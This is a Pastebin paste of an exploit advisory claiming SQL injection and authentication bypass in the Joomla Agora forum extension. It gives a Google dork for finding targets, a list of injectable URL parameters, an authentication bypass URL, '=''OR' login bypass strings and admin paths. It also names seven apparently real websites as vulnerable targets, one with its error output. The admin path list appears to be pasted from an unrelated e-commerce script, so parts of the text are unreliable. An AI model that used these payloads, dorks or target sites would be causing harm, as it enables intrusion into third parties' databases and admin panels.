Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Agora 4.10 SQL Injection / Authentication Bypass
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : joomla4ever.org
- # Software Download Link : joomla4ever.org/archive/ext/com_agora.zip
- # Software Information Link : joomla4ever.org/extensions/ext-agora
- joomlashack.com/blog/joomla/agora/
- # Software Version : 3.0 and 4.10 - other previous versions.
- Compatible with Joomla 1.5 - 2.5 and 3.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_agora''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-287 [ Improper Authentication ]
- CWE-592 [ Authentication Bypass Issues ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Agora is forum extension for Joomla compatible with 1.5 - 2.5 and 3.x version.
- ####################################################################
- # Impact :
- ***********
- Joomla Agora 4.10 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_agora&task=[SQL Injection]
- /index.php?option=com_agora&task=profile&user_id=[SQL Injection]
- /index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_agora&task=topic&id=[ID-NUMBER]&p=[SQL Injection]
- /index.php?option=com_agora&task=profile&page=[SQL Injection]
- /index.php?option=com_agora&task=profile&page=preview&action=[SQL Injection]
- /index.php/templates/index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=[SQL Injection]
- /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=[SQL Injection]&lang=en
- /component/agora/?task=viewforum&id=[SQL Injection]
- ####################################################################
- # Authentication Bypass/Incorrect Authorization Exploit :
- *************************************
- /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=1&lang=en
- Proof of Concept => cdn.pbrd.co/images/I0GjhUq.png
- # Admin Panel Login Path :
- /administrator
- [PATH]/admin
- Note : Admin Password is the domain address name.
- '=''OR'
- '=''OR'
- /admin/index.php?option=com_agora&task=upload
- /admin/mystore.php
- /admin/editproducts.php
- /admin/editcat.php
- /admin/orders.php
- /admin/members.php
- /admin/editmanu.php
- /admin/editpayment.php
- /admin/addtaxrules.php
- /admin/editshipping.php
- /admin/newsletter.php
- /admin/editpromos.php
- /admin/import_export.php
- /admin/editlangfile.php
- /admin/custom_config.php
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] spdst.ehost.pl/index.php?option=com_agora&task=profile&page=
- preview&action=add_warning&type=clean&user_id=1&lang=en
- [+] gioblu.com/index.php?option=com_agora&id=1&Itemid=39
- [+] vk-duisburg.de/index.php?option=com_agora&task=topic&id=870&p=936
- [+] atlanticgreenbuilding.ca/index.php?option=com_agora&task=profile&user_id=7281
- [+] afcommerce.com/demostore/admin/index.php?option=com_agora&task=upload
- [+] milosnicy-historii.org/index.php/templates/index.php?option=com_agora&id=1&Itemid=17
- [+] goltz-optique.ch/component/agora/?task=viewforum&id=1
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Invalid argument supplied for foreach() in
- /web/htdocs/www.gioblu.com/home/components
- /com_agora/controller/index.php on line 145
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement